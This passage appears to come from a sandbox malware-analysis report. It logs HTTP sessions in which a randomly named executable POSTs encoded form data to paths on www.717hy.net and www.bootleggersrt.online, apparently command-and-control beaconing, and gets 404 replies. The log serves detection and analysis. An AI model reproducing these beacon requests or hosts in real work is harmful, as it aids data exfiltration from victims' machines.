                                                                                                                            Dec 3, 2024 14:39:13.325939894 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                                                                            Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.9435
                                                                                                                            Dec 3, 2024 14:39:13.326571941 CET672INData Raw: 39 35 35 34 30 37 2c 32 30 2e 31 34 32 31 38 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30
                                                                                                                            Data Ascii: 955407,20.14218 -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.2
                                                                                                                            Dec 3, 2024 14:39:13.326729059 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                                                                            Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                                                            Dec 3, 2024 14:39:13.447828054 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                                                                            Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.64994668.66.226.92805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:19.361783028 CET794OUTPOST /ffyl/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.717hy.net
                                                                                                                            Referer: http://www.717hy.net/ffyl/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4a 32 59 57 70 4f 30 79 54 30 6c 67 38 55 42 48 47 6d 62 44 61 4d 31 4f 65 70 2f 55 6a 30 54 34 50 35 68 49 6f 41 6f 64 30 69 35 7a 34 4e 52 75 62 5a 79 67 71 6c 39 5a 78 54 34 56 45 64 64 5a 58 48 57 4a 6f 48 30 62 55 67 73 65 55 65 39 74 4a 62 45 58 6a 48 6c 7a 63 79 32 78 4d 36 34 70 4e 55 78 64 39 5a 43 58 45 58 7a 42 7a 44 6f 56 49 46 79 6d 49 68 75 76 58 62 67 64 44 6b 48 70 78 56 32 66 77 67 66 6b 6c 49 4a 51 6e 75 30 68 74 4f 62 48 6a 34 47 78 63 58 78 64 6e 55 76 76 75 7a 44 68 2b 32 75 50 2b 4a 58 49 6a 4e 44 41 38 41 68 61 75 51 71 59 63 79 45 73 57 59 44 43 31 2b 63 6e 56 30 38 66 2f 4c 4f 55
                                                                                                                            Data Ascii: u6nP_F48=J2YWpO0yT0lg8UBHGmbDaM1Oep/Uj0T4P5hIoAod0i5z4NRubZygql9ZxT4VEddZXHWJoH0bUgseUe9tJbEXjHlzcy2xM64pNUxd9ZCXEXzBzDoVIFymIhuvXbgdDkHpxV2fwgfklIJQnu0htObHj4GxcXxdnUvvuzDh+2uP+JXIjNDA8AhauQqYcyEsWYDC1+cnV08f/LOU
                                                                                                                            Dec 3, 2024 14:39:20.606991053 CET1159INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:20 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.64995368.66.226.92805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:22.028326988 CET818OUTPOST /ffyl/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.717hy.net
                                                                                                                            Referer: http://www.717hy.net/ffyl/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4a 32 59 57 70 4f 30 79 54 30 6c 67 7a 56 78 48 4b 6c 7a 44 57 38 31 50 43 35 2f 55 70 55 53 2f 50 35 6c 49 6f 42 39 57 30 32 56 7a 34 6f 39 75 61 62 61 67 72 6c 39 5a 37 7a 34 51 4a 39 64 43 58 48 61 76 6f 47 49 62 55 67 6f 65 55 62 42 74 4f 73 59 55 78 6e 6c 78 56 53 32 33 44 61 34 70 4e 55 78 64 39 5a 58 38 45 55 44 42 7a 7a 59 56 4f 67 65 6c 57 52 75 6f 41 72 67 64 48 6b 48 74 78 56 32 39 77 69 72 4f 6c 4e 56 51 6e 76 6b 68 73 66 62 45 6f 34 47 37 53 33 77 36 32 6b 79 62 72 6c 58 6a 39 6c 6d 4b 6a 36 76 4e 6d 37 65 61 67 7a 68 35 38 41 4b 61 63 77 63 65 57 34 44 6f 33 2b 6b 6e 48 6a 77 34 77 2f 72 33 74 75 54 70 44 53 71 33 4f 69 73 68 65 4a 78 4f 43 48 5a 77 5a 77 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=J2YWpO0yT0lgzVxHKlzDW81PC5/UpUS/P5lIoB9W02Vz4o9uabagrl9Z7z4QJ9dCXHavoGIbUgoeUbBtOsYUxnlxVS23Da4pNUxd9ZX8EUDBzzYVOgelWRuoArgdHkHtxV29wirOlNVQnvkhsfbEo4G7S3w62kybrlXj9lmKj6vNm7eagzh58AKacwceW4Do3+knHjw4w/r3tuTpDSq3OisheJxOCHZwZw==
                                                                                                                            Dec 3, 2024 14:39:23.282828093 CET1159INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:23 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.64996068.66.226.92805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:24.702032089 CET1831OUTPOST /ffyl/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.717hy.net
                                                                                                                            Referer: http://www.717hy.net/ffyl/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4a 32 59 57 70 4f 30 79 54 30 6c 67 7a 56 78 48 4b 6c 7a 44 57 38 31 50 43 35 2f 55 70 55 53 2f 50 35 6c 49 6f 42 39 57 30 32 64 7a 34 2b 70 75 59 36 61 67 35 31 39 5a 6c 6a 34 52 4a 39 63 43 58 48 53 72 6f 47 45 4c 55 6a 41 65 46 4f 4e 74 50 64 59 55 6f 58 6c 78 4b 43 32 79 4d 36 34 47 4e 55 68 6a 39 5a 48 38 45 55 44 42 7a 31 38 56 4f 31 79 6c 55 52 75 76 58 62 67 76 44 6b 47 4b 78 56 50 43 77 69 2f 30 6b 35 5a 51 6e 4f 55 68 76 74 7a 45 72 59 47 31 56 33 77 69 32 6b 2b 45 72 68 32 63 39 6d 36 73 6a 35 7a 4e 6d 4e 4b 41 79 53 42 68 6a 43 43 58 64 48 30 33 65 2f 44 6d 2f 4f 59 4b 45 68 45 4e 6f 2b 6a 55 72 4c 50 6b 4b 53 2f 75 42 6b 63 37 41 76 4a 63 4c 56 4d 73 4c 53 70 39 44 78 42 4c 71 6c 4e 34 6b 53 39 61 6e 50 49 43 61 50 51 69 35 61 36 35 74 36 42 68 4b 5a 59 39 6e 55 68 56 57 6c 53 56 72 32 75 70 79 51 61 51 54 45 61 42 30 58 6d 75 43 6c 7a 67 69 6e 56 75 76 44 46 65 52 31 4d 73 44 70 42 4b 70 67 6e 4b 68 50 48 53 42 75 78 48 33 36 6b 6e 6e 55 36 75 71 34 47 66 70 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=J2YWpO0yT0lgzVxHKlzDW81PC5/UpUS/P5lIoB9W02dz4+puY6ag519Zlj4RJ9cCXHSroGELUjAeFONtPdYUoXlxKC2yM64GNUhj9ZH8EUDBz18VO1ylURuvXbgvDkGKxVPCwi/0k5ZQnOUhvtzErYG1V3wi2k+Erh2c9m6sj5zNmNKAySBhjCCXdH03e/Dm/OYKEhENo+jUrLPkKS/uBkc7AvJcLVMsLSp9DxBLqlN4kS9anPICaPQi5a65t6BhKZY9nUhVWlSVr2upyQaQTEaB0XmuClzginVuvDFeR1MsDpBKpgnKhPHSBuxH36knnU6uq4GfpXDEptQggHgS5y8sZp6jU4IWWMuWX7d1bCKw8FIjYLW5dWLQwZAkUQxOmI4oAJPbgzwek0eHrfB11TX67gLUlyZD/8KDU9UX6xeLcOBgjo0+tKN3rZVRKLvQdFcDdi/b5VHdUkTHbTYmCVJTzme9nE+3tG6X/kAOtnR1hEgYWptcKiRyu/Xf1k071gSi2r2DjXSCytUkkuGtiPOd2nvD/Ii2pyfmGfGtfu3x+wSFE4wu6/lQwDn4qIyc9vm3NfqvPFdUAfKbQDYyER2ew9u8J0Pj3+0UJNLv4an63vz5lzCrrZzCTtbUgvF5rbdeJIFb5rLv36vv2PT2tbp8t39nkZp0XHl6H8D54Aw07KRpIMwX+7pJANZiCyVPUbXk3msNzNq4t+0JpftluU0vDyyq0umD5DMgRStkzh58QVZzPlin+zsRRAGuJVhJ+eS+/CTApF79m6g/2MaDNg73KbKnIZnl95yf1ePo228k9Td1CvXkVKVmwntvEhMJXGs3wWB33PdA5C7XYJKyE3FDIDtwPqCSPlWbHVb98CZDyZSLGx1i69AQEwHBbKELuuaTD9SkaFfXqpP/CQ3RGTVsLQy/aezjk5hcM4QB0bf9aL6u9SxlfabP6s6pT72AphvYYHvCN83A/wnubOjZ6C2B2qHmHmCz8LYjl3nUnaZ [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:25.939481020 CET1159INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:25 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.64996568.66.226.92805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:27.373379946 CET549OUTGET /ffyl/?u6nP_F48=E0w2q4MWRkFX7XJTCFHtBeMrFLWo0m25Rc1Iug5umE0SqvxIQJbSqlJsxR0jPeALC0qf+EILQRQVRMVyHOYHvE1WYG6fPKkQNyF776m1LEnS8hs9By21ThuVAZMLKVLgjh2k5HE=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:39:28.655323982 CET1159INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:28 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.64998131.31.196.17805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:34.462908983 CET827OUTPOST /7a5n/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.bootleggersrt.online
                                                                                                                            Referer: http://www.bootleggersrt.online/7a5n/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 66 34 36 6e 46 78 6e 68 55 54 53 52 71 57 57 2b 63 77 31 42 44 38 79 6f 59 31 4d 77 4e 56 4b 78 51 37 66 75 61 6a 37 4c 57 45 61 6c 50 55 32 4b 2b 35 4b 54 51 4d 38 56 64 58 71 66 36 51 75 78 63 46 4c 30 49 4a 50 6a 68 47 43 39 43 6c 55 68 33 35 76 75 48 4a 34 76 4d 4e 68 47 64 2f 45 6b 4b 41 5a 57 54 70 50 53 54 52 4e 69 4e 6e 33 63 5a 77 4a 39 38 30 50 77 4a 72 66 5a 47 66 70 7a 73 2f 37 4c 46 50 65 74 69 43 55 53 43 54 76 75 6d 36 32 73 79 77 43 75 37 67 67 4c 51 76 52 6c 73 4f 37 4a 33 52 42 36 79 4f 4e 46 65 49 34 45 4e 55 47 56 67 50 38 46 65 2f 50 46 5a 49 72 43 75 45 66 78 55 73 55 61 48 55 30 4c
                                                                                                                            Data Ascii: u6nP_F48=f46nFxnhUTSRqWW+cw1BD8yoY1MwNVKxQ7fuaj7LWEalPU2K+5KTQM8VdXqf6QuxcFL0IJPjhGC9ClUh35vuHJ4vMNhGd/EkKAZWTpPSTRNiNn3cZwJ980PwJrfZGfpzs/7LFPetiCUSCTvum62sywCu7ggLQvRlsO7J3RB6yONFeI4ENUGVgP8Fe/PFZIrCuEfxUsUaHU0L
                                                                                                                            Dec 3, 2024 14:39:35.822945118 CET314INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:35 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.64998731.31.196.17805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
